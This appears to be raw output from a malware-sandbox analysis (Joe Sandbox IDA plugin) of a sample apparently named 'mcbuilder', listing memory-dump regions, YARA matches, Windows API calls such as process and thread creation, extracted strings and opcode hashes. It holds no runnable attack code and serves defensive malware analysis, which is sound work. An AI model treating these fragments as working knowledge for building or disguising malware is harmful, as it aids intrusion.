                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID: F
                                                • API String ID: 2340568224-909703421
                                                • Opcode ID: 42c56e24e853aefa9ec4c1ba41db988a3db08652e2b85d4f6893706afe055cf6
                                                • Instruction ID: aa3b7768492e80dfb8ee4f5c8dcf01849f4adc816c037518921695cee01f6483
                                                • Opcode Fuzzy Hash: 42c56e24e853aefa9ec4c1ba41db988a3db08652e2b85d4f6893706afe055cf6
                                                • Instruction Fuzzy Hash: 8091B4B5C01718AADB25DFA4DC81FEEB7BDEF94304F048599E509AA141E7306B44CFA1
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 030AF337
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Initialize
                                                • String ID: @J7<
                                                • API String ID: 2538663250-2016760708
                                                • Opcode ID: 1f5c014d43f95c35e7f5732bd92f200eb03824f9628108117049976796c31276
                                                • Instruction ID: 68bd803631a8b6fd644ca2cb62b673c8d7c837dc86eb3d767b1dca20802e6519
                                                • Opcode Fuzzy Hash: 1f5c014d43f95c35e7f5732bd92f200eb03824f9628108117049976796c31276
                                                • Instruction Fuzzy Hash: C64133B6A0060AAFDB10DFD8DC809EEB7B9FF88304F148559E505EB214D775EA458BA0
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 030AF337
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Initialize
                                                • String ID: @J7<
                                                • API String ID: 2538663250-2016760708
                                                • Opcode ID: b8e2a9bc7a01c87d4c2c7e3d300131b65d6a850b9c0b8c48134c5b11b9905be1
                                                • Instruction ID: 20bd7f26eee3cdd94a0451590460dcfe10f5d9d75bcff2b58d4b48d3131d27a6
                                                • Opcode Fuzzy Hash: b8e2a9bc7a01c87d4c2c7e3d300131b65d6a850b9c0b8c48134c5b11b9905be1
                                                • Instruction Fuzzy Hash: BD3130B6A0060AAFDB00DFD8DC809EFB7B9FF88304B108559E515EB214D775EE458BA0
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 030A4812
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 9aead03d5917cd9eedf64c213fed65a1ff43d0142e135a2e87ed648fb51c44ed
                                                • Instruction ID: 352f4571efd798586b24ffe07e19e8e5542755fffd6abf804956ebb0561fda42
                                                • Opcode Fuzzy Hash: 9aead03d5917cd9eedf64c213fed65a1ff43d0142e135a2e87ed648fb51c44ed
                                                • Instruction Fuzzy Hash: 7F01F7B9D00249BFDB20DBE8EC41FDFBBB8DF45208F144195E94897241E630EA05CB91
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 030A4812
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 901762d70c1facbf16f74a98b42673f6f147b3b8484110a3e016d9ffbcbb916f
                                                • Instruction ID: 649d9f8a95cd7dce9fc27695ab26d14bdd87eaa7af00ae67034b4616189721ce
                                                • Opcode Fuzzy Hash: 901762d70c1facbf16f74a98b42673f6f147b3b8484110a3e016d9ffbcbb916f
                                                • Instruction Fuzzy Hash: 330121B9E0120DBBDF14EBE5EC41FDEB7B89B44608F044295E9099B240F671EB54CB91
                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,030A813E,00000010,?,?,?,00000044,?,00000010,030A813E,?,?,?), ref: 030B90F0
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: aef7352e7393d5443ccc0b5acfa055d02e0a020d95f9c9e969a8298cb411fb91
                                                • Instruction ID: 8ae61a9540791b35fd9a79a28efded4c514203e78bb32c11918881f0ed6ce5ba
                                                • Opcode Fuzzy Hash: aef7352e7393d5443ccc0b5acfa055d02e0a020d95f9c9e969a8298cb411fb91
                                                • Instruction Fuzzy Hash: 3501D2B6210209BBCB44DE89DC80EEB77ADAFCC754F008108FA09E7241D630F851CBA4
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03099B05
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 97d41cd2c0b60530ada9ee538a96ce8ee90df784c3a7136aab04a040812068a5
                                                • Instruction ID: fc077cd6c45cc7fc8d223ba5a8f430688782f4a2f80eef7fcfc483efeee4e315
                                                • Opcode Fuzzy Hash: 97d41cd2c0b60530ada9ee538a96ce8ee90df784c3a7136aab04a040812068a5
                                                • Instruction Fuzzy Hash: 96F06D3738530476E730A1A99D02FD7B39CCBC5A61F140426FA0DEB1C0D9A6B44143F8
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 030A4812
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 738ca3b7c514936c4173a818d1e11c85168a86b6f21764aebb017d457081d771
                                                • Instruction ID: bfa16b32cec09bf73e34e8394dbdaae1079fd8e30d6debe15b4848ec0b7492ac
                                                • Opcode Fuzzy Hash: 738ca3b7c514936c4173a818d1e11c85168a86b6f21764aebb017d457081d771
                                                • Instruction Fuzzy Hash: 0CF0243D21544EAED750CE99EC40FCDBBA8EB05654F0443D9D9688B2C1D230E40DC380
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D633B48D,00000007,00000000,00000004,00000000,030A402F,000000F4), ref: 030B903F
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: 17568c7ae09f18499743ae8ac1d4d72313a42befbe6544b35fb4508f614ffe59
                                                • Instruction ID: dc1cfaa35dacf3f742b26777172c377790bb9841b8308b969a0d390386b711c5
                                                • Opcode Fuzzy Hash: 17568c7ae09f18499743ae8ac1d4d72313a42befbe6544b35fb4508f614ffe59
                                                • Instruction Fuzzy Hash: 2FE06D762003047BE614EE58DC40FDB33ACEFC9710F00440AFA18A7241D630B910CAB4
                                                APIs
                                                • RtlAllocateHeap.NTDLL(030A1886,?,030B4F8E,030A1886,030B4F6E,030B4F8E,?,030A1886,030B4F6E,00001000,?,?,00000000), ref: 030B8FEC
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: e6e382b7dac3f798f8f3023e391c5777cc1d513eddb89b76d97a022a8894131b
                                                • Instruction ID: 26051c89fd9ae968346332df4bec98a0d5d4d339d1207a1bb5fec59cac98715b
                                                • Opcode Fuzzy Hash: e6e382b7dac3f798f8f3023e391c5777cc1d513eddb89b76d97a022a8894131b
                                                • Instruction Fuzzy Hash: DFE06576204304BBEA14EE58DC40FDB33ECEFC9750F004019FA08AB241C670B9108AB9
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 030A81AC
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 4a6ee6b496e1e6d6e7dc5a3cfe154c434e47f155942d25cc74983696e9c56501
                                                • Instruction ID: 13351503712c68a02005eda7a8d2570654e4693a06595f12f9a84b7d5766b00c
                                                • Opcode Fuzzy Hash: 4a6ee6b496e1e6d6e7dc5a3cfe154c434e47f155942d25cc74983696e9c56501
                                                • Instruction Fuzzy Hash: 79E0867524170427FB24FAECEC49FA6339D9B48664F1D8660F96CDB2C1E578F5014290
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c9a444739ec70fa53243310ca373b5d16f7fd83cd5e036f75b5a640a166fccd9
                                                • Instruction ID: f4365aa57f1018b18b3824f9fb1f835d5a503874304d825e0ea778486c4e1033
                                                • Opcode Fuzzy Hash: c9a444739ec70fa53243310ca373b5d16f7fd83cd5e036f75b5a640a166fccd9
                                                • Instruction Fuzzy Hash: 3BB09B719015C5D9DA11E7A0460871B7A0467D1701F29C4E1D3034641E4739C5D5E176
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493514195.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3bb0000_mcbuilder.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b5e4d8e6f33e47aeaa4d935c6bdd578c04f06ce96fc5675625634e2ba80ae5e9
                                                • Instruction ID: 11fb38ad85edd2a9b53f007db825df3c41257425b9863af121a0f3b6db8cdc5a
                                                • Opcode Fuzzy Hash: b5e4d8e6f33e47aeaa4d935c6bdd578c04f06ce96fc5675625634e2ba80ae5e9
                                                • Instruction Fuzzy Hash: 2541C4B4618F095FD358EF68D0802BAB3F5FB89308F5005BDD496C7662EFB1E4528685
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493514195.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3bb0000_mcbuilder.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                • API String ID: 0-3558027158
                                                • Opcode ID: 8b6bfd9641ca40b967443cd7c311b4ddbb90ec83cbeed4ecbcb3944c76344322
                                                • Instruction ID: 9ba5094cb388976549d25f38c2b657f5b5f0650f442299960e80b9e7915613fb
                                                • Opcode Fuzzy Hash: 8b6bfd9641ca40b967443cd7c311b4ddbb90ec83cbeed4ecbcb3944c76344322
                                                • Instruction Fuzzy Hash: EC914EF04082988AC7158F55A0612AFFFB5EBC6305F15816DE7E6BB243C3BE8905CB95
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 2c9fa848dcd93daf1e959a2008e89fb5c0535b112e58bec84ac553f3b28fa5f0
                                                • Instruction ID: 865e8fb32b7f4691b8d6695ff6da90f40ee8477736e9bd548a52ca85f0323807
                                                • Opcode Fuzzy Hash: 2c9fa848dcd93daf1e959a2008e89fb5c0535b112e58bec84ac553f3b28fa5f0
                                                • Instruction Fuzzy Hash: 2D51B9B6A0421ABFCB20DBDCC89097EF7B8BB49201B5486E9E4A5D7641D274DE50C7E0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 7851061a325920e0c9190828e2f428782b99a069088c712f0195669b2da6f1bf
                                                • Instruction ID: bc9e99965df7b6e24638550c5bc01d831b5a4a59fd285a98f6c6ec0c9eb46838
                                                • Opcode Fuzzy Hash: 7851061a325920e0c9190828e2f428782b99a069088c712f0195669b2da6f1bf
                                                • Instruction Fuzzy Hash: 665191A9A00645AECB20DB9CC890D7EB7BDEF44241B448CA9F4E6D7641E6B4EA408760
                                                Strings
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03904725
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03904742
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 039046FC
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 03904787
                                                • ExecuteOptions, xrefs: 039046A0
                                                • Execute=1, xrefs: 03904713
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03904655
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: 90a11120ad330aa9316afc9daf16787f593caf79bbfd40cf61e6f51332de0cf5
                                                • Instruction ID: b4c47fe8fe21574fbbcf15eaac15ebff2b5246a519ea5bbab6dbf9bfd97cd0ba
                                                • Opcode Fuzzy Hash: 90a11120ad330aa9316afc9daf16787f593caf79bbfd40cf61e6f51332de0cf5
                                                • Instruction Fuzzy Hash: F0510535A1025D6EDB10EBE9DC89FAEB7A8AB44304F1400EDE605EB291EB70DA41CF51
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                • Instruction ID: a4c03fd2df6be001dbe9d6212e2e6bf9aff9c5eb64ced1afed47ac71e8a1460e
                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                • Instruction Fuzzy Hash: DA024475509341AFC305CF68C890A6FBBE9EFC8744F448A6DF9898B264DB35E905CB42
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                • Instruction ID: d01c2ce8ee9bb35fcf6894762d342fc356de52d45cf271a8f2423c260eff7501
                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                • Instruction Fuzzy Hash: 40819D74E052499BDF26CEE8C8917BEBBB5AF45360F1E41D9D861E7390C7349840CB51
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$[$]:%u
                                                • API String ID: 48624451-2819853543
                                                • Opcode ID: 3b20a479cdd04fe023ad37aa7c66e5aaae220c4724062dea890ed4ce9188f539
                                                • Instruction ID: 0887ad1f266dca780235220ae09d0aa781667f2969da057a2f1730d0ed05f121
                                                • Opcode Fuzzy Hash: 3b20a479cdd04fe023ad37aa7c66e5aaae220c4724062dea890ed4ce9188f539
                                                • Instruction Fuzzy Hash: 1021367AA00219ABDB10DFA9D840DAFB7ECAF58644F480566F955D7200E770D901CBA1
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 0390031E
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039002E7
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039002BD
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: 7efe7d6548420a30baa0942e9d0be7a417eef2200f3a1e23604de184d71f689c
                                                • Instruction ID: 3dfe56bd7707a4f65ff17d4d3c0fd7993ef1ea9344fd19a9718e2132b060c880
                                                • Opcode Fuzzy Hash: 7efe7d6548420a30baa0942e9d0be7a417eef2200f3a1e23604de184d71f689c
                                                • Instruction Fuzzy Hash: 2EE1AB306087429FD725CF68C884B6AB7F4BB89714F180AA9F6A5CB3E1D774D944CB42
                                                Strings
                                                • RTL: Resource at %p, xrefs: 03907B8E
                                                • RTL: Re-Waiting, xrefs: 03907BAC
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03907B7F
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: 847cc7e9e10a4346d511c23bdf1256f1673f811cd3bed0ca3a2d0c4b2b16c185
                                                • Instruction ID: 8b2b92ce8a4b44f6adff2ae127dd89a5f46e6c6b62b4d8a728c19fa43bf86768
                                                • Opcode Fuzzy Hash: 847cc7e9e10a4346d511c23bdf1256f1673f811cd3bed0ca3a2d0c4b2b16c185
                                                • Instruction Fuzzy Hash: B6410335710B469FC725DEA8C841B6AB7E9EF88720F040A9DF85ADB780DB30E405CB91
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0390728C
                                                Strings
                                                • RTL: Resource at %p, xrefs: 039072A3
                                                • RTL: Re-Waiting, xrefs: 039072C1
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03907294
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: 2b53cc9f06c6b4ebd8dc5a76d58f8c9d9c935009b76fb0794b0ef42285085b17
                                                • Instruction ID: 237e6247350f54123a368bad566fd3a99525d1e64ae85c0da68125d7d60911d5
                                                • Opcode Fuzzy Hash: 2b53cc9f06c6b4ebd8dc5a76d58f8c9d9c935009b76fb0794b0ef42285085b17
                                                • Instruction Fuzzy Hash: 6A41013560464AAFC721DEA8CC42B6AB7A9FF84724F140A58F855EB280DB30F852C7D1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: 0bad0587b76c3d0c2db892e1ee30f0cd0e0a9af69e6e97c57c48425adf1418de
                                                • Instruction ID: 155c39814fbb38718fef8b9b3327c21a682a5259cdef4e3304f4f84c451bb50f
                                                • Opcode Fuzzy Hash: 0bad0587b76c3d0c2db892e1ee30f0cd0e0a9af69e6e97c57c48425adf1418de
                                                • Instruction Fuzzy Hash: 4E314876A006199FCB20DF69DC40FEEB7BCFB44650F444995F899E7240FB309A458B61
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                • Instruction ID: 9945df7f447d9d4f697d49602fc2137c58c7f38de12e0ba95bb45be5d1acf284
                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                • Instruction Fuzzy Hash: AD91A070E0021A9BDF34DEE9C881ABEF7A5EF44720F58459AF865EB2C4EB309940C751
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
                                                • Opcode ID: 0e36a7d2369083d2b693ec9b8991d2ecc1f46cb67b90916a475708e37433d07f
                                                • Instruction ID: 213a6f5fdf597329f0ba604b433187bb2bd557d4512df48128b5709e92be04a5
                                                • Opcode Fuzzy Hash: 0e36a7d2369083d2b693ec9b8991d2ecc1f46cb67b90916a475708e37433d07f
